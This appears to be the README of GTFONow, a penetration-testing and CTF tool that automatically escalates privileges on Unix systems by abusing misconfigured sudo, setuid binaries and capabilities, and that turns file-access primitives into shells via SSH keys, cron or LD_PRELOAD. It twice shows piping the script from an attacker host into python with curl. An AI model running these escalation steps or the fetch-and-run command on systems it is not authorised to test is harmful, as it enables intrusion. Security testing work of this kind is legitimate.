Automatic privilege escalation for misconfigured capabilities, sudo config and setuid/setguid binaries.
| Feature | Implemented |
|---|---|
| Automatically exploit misconfigured sudo permissions. | ✔️ |
| Automatically exploit misconfigured suid, sgid permissions. | ✔️ |
| Automatically exploit misconfigured capabilities. | ✔️ |
| Automatically convert arbitrary file read primitive into shell by stealing SSH keys. | ✔️ |
| Automatically convert arbitrary file write primitive into shell by dropping SSH keys. | ✔️ |
| Automatically convert arbitrary file write primitive into shell by writing to cron. | ✔️ |
| Automatically convert arbitrary file write primitive into shell using LD_PRELOAD. | ✔️ |
Single file, easy to run fileless with curl http://attackerhost/gtfonow.py | python |
✔️ |
| Interactionless mode. For environments where stdin is not controllable. | Todo |
By design GTFONow is a backwards compatible, stdlib only python script, meaning it should work on any variant of Unix if Python is installed.
| Platform | Supports |
|---|---|
| Python2.* | ✔️ |
| Python3.* | ✔️ |
| No 3rd party dependencies | ✔️ |
| Any Unix Variant (Linux, MacOS,*Nix) | ✔️ |
| Any architecture eg (X86/ARM64/X86-64) | ✔️ |
| Systems without Python installed | Todo |
To use GTFONow, simply run the script from your command line. The basic syntax is as follows:
python gtfo_now.py [OPTIONS]It can also be run by piping the out put of curl:
curl http://attacker.host/gtfonow.py | pythonHere are the options you can use with GTFONow:
-
--level: Sets the level of checks to perform. You can choose between:1(default) for a quick scan.2for a more thorough scan.- Example:
python gtfonow.py --level 2
-
--risk: Specifies the risk level of the exploit to perform. The options are:1(default) for safe operations.2for more aggressive operations, primarily for use in CTFs, if using on real engagements, ensure you understand what this is doing.- Example:
python gtfonow.py --risk 2
-
--sudo_password: Enables sudo_password mode, offering more privilege escalation options if you know the sudo password.- This option does not require a value. You will be prompted to enter the sudo password via stdin.
- Example:
python gtfonow.py --sudo_password
-
--command: Issues a single command instead of spawning an interactive shell. This is mainly for debugging purposes.- Example:
python gtfonow.py --command 'ls -la'
- Example:
-
-v,--verbose: Enables verbose output.- Example:
python gtfonow.py --verbose
- Example:
Here are some example commands to get you started:
-
Perform a quick scan:
python gtfonow.py
-
Perform a thorough scan with a higher risk level:
python gtfonow.py --level 2 --risk 2
- Payloads thanks to GTFOBins.